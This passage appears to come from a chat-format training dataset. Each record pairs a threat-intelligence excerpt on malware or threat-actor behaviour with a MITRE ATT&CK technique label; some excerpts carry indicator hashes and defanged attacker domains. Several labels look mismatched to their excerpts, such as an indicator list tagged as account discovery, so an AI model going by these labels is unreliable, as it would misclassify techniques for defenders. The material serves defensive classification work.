Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET performs AES-CBC encryption on files under \"~/Documents\", \"~/Downloads\", and\n\"~/Desktop\" with a fixed key and renames files to give them a \".enc\" extension. Only files with sizes \nless than 500MB are encrypted." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Users are advised to avoid opening attachments and click links on unsolicited emails" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has created accounts with \"net user\"." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Messages are encrypted using AES with a static key" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has modified file and directory timestamps." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7   Add/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3   Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4   Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor’s installation directory with the .bin extension" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be configured to use HTTP or DNS for command and control." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An older version of has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A malware sample adds persistence on the system by creating a shortcut in the user’s Startup folder." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RGDoor uses cmd.exe to execute commands on the victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used a tool known as RemoteExec (similar to PsExec) to remotely execute batch scripts and binaries." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony" }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019" }, { "role": "assistant", "content": "T1137.006 - Office Application Startup: Add-ins" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar has a command to open the command-line on the infected system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke has been regularly repacked by its operators to create large binaries and evade detection." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They then identify the Exchange server and attempt to install the OwaAuth web shell" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emissary has the capability to execute the command \"ipconfig /all\"." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used large file sizes to avoid detection." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT has used AutoIt to compile the payload and main script into a single executable after delivery." }, { "role": "assistant", "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd." }, { "role": "assistant", "content": "T1202 - Indirect Command Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "YAHOYAH checks for the system’s Windows OS version and hostname." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type has run the command `net user` on a victim." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BS2005 uses Base64 encoding for communication in the message body of an HTTP request." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can gather information regarding the user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can communicate over DNS with the C2 server." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak encrypts strings to make analysis more difficult." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Encoding the encryption key In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can enumerate Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands." }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774)." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can stage files in a central location prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain a list of smart card readers attached to the victim." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs a reflective DLL injection using a given pid." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre has been delivered with encrypted resources and must be unpacked for execution." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can collect the host's IP addresses using the \"ipconfig\" command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon copies itself to the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can decrypt AES encrypted C2 communications." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AutoFocus customers may learn more from the DarkHydrus tag IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream fortiweb[.]download kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid" }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor execution begins from a scheduled task named `Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Recent versions of Cherry Picker delete files and registry keys created by the malware." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has searched for folders associated with antivirus software." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use built-in modules to abuse trusted utilities like MSBuild.exe." }, { "role": "assistant", "content": "T1127 - Trusted Developer Utilities Proxy Execution', 'T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has used mshta.exe to execute malicious VBScript." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda will delete their tools and files, and kill processes after their objectives are reached." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has used commands and API calls to gather system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the exfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn’t encode the stolen data or store the data in sessionStorage before the exfiltration" }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative 